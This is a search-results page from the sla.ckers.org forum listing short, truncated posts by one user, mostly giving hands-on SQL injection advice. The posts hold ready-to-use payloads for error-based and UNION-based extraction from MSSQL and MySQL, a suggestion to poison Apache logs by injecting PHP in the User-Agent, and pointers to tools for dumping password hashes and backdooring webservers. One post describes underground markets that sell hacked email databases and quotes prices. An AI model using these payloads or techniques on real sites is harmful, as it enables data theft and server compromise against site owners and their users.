Sla.ckers.org
Ways to stop spam, detect robotic activity, and actually harm the spam trade, as well as how it works, how to circumvent filters, etc. 

Current Page: 1 of 1
Results 1 - 9 of 9
5 years ago
badeat
OK, I don't have time to play with mssql server so you have to try this because I'm not sure if they work... try vuln.cfm?var=1 AND CAST(SELECT TOP 1 name FROM sysobjects WHERE xtype=char(85) as nvarchar)=1 or vuln.cfm?var=1 AND CAST(SELECT TOP 1 name FROM sysobjects WHERE xtype=char(85) as nvarchar)=CAST(1 as int) or vuln.cfm?var=1 AND CAST(CAST(SELECT TOP 1 name FROM sysobjects WHERE
Forum: SQL and Code Injection
5 years ago
badeat
For (2) Find out which apache version and what operating system it is. Then use this website -> http://wiki.apache.org/httpd/DistrosDefaultLayout to see where the logs' default location will be. If they have been relocated, read httpd.conf and you will find them. For (1) Are you sure you looked at the latest log? Try injecting the php code in the User-Agent. If they have a forum, try reading
Forum: SQL and Code Injection
5 years ago
badeat
It's not blind. Let's say you put "union select 1,2,3,4--" The webserver gets that and uses it in more than one query. One of them uses four columns, while the others use more. Thus the one that uses four columns will execute the query while the rest will give an error. We only want one of them to work, thus this is perfect. Try -481234+union+select 1,2,concat(0x5448494E4B583A20,@@ve
Forum: SQL and Code Injection
5 years ago
badeat
You can find a location of Apache configurations at this resource: http://wiki.apache.org/httpd/DistrosDefaultLayout Also a very good article -> "Backdoor webserver using MYSQL SQL injection" http://www.greensql.net/publications/backdoor-webserver-using-mysql-sql-injection
Forum: SQL and Code Injection
5 years ago
badeat
Get the id for each table that shows up and then try SELECT name FROM sysobjects WHERE xtype=char(85) AND ID NOT IN (table'sID)
Forum: SQL and Code Injection
5 years ago
badeat
For : (SELECT TOP 1 user FROM table_name) try CAST to force the value as nvarchar and thus cause an error..example: SELECT CAST(1 as nvarchar) (to be sure google up cast syntax for mssql 2000) As far as this-> "But it didn't work for -1 AND (SELECT TOP 1 name FROM sysobjects WHERE xtype=char(85) AND Id=X)=1 " Most probably the id you used didn't have any tables with xtype
Forum: SQL and Code Injection
5 years ago
badeat
If I were you I would check out this http://sqlninja.sourceforge.net/ Direct quotation: "Fancy going from a SQL Injection to a full GUI access on the DB server? What about extracting password hashes on the fly? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug sc
Forum: SQL and Code Injection
5 years ago
badeat
it's mysql version 4.-something and exploitable.
Forum: SQL and Code Injection
5 years ago
badeat
There are forums that you have to get vouched for by 3-5 people to access. Usually Russian since all the English speaking ones keep getting raided by the FBI/Interpol. Anyhow, email databases go for 5 to 10 dollars per 1000. The price depends on: a) If the database is fresh -> that means databases retrieved from legit websites, normally by hacking, and that haven't been sold already. b
Forum: SPAM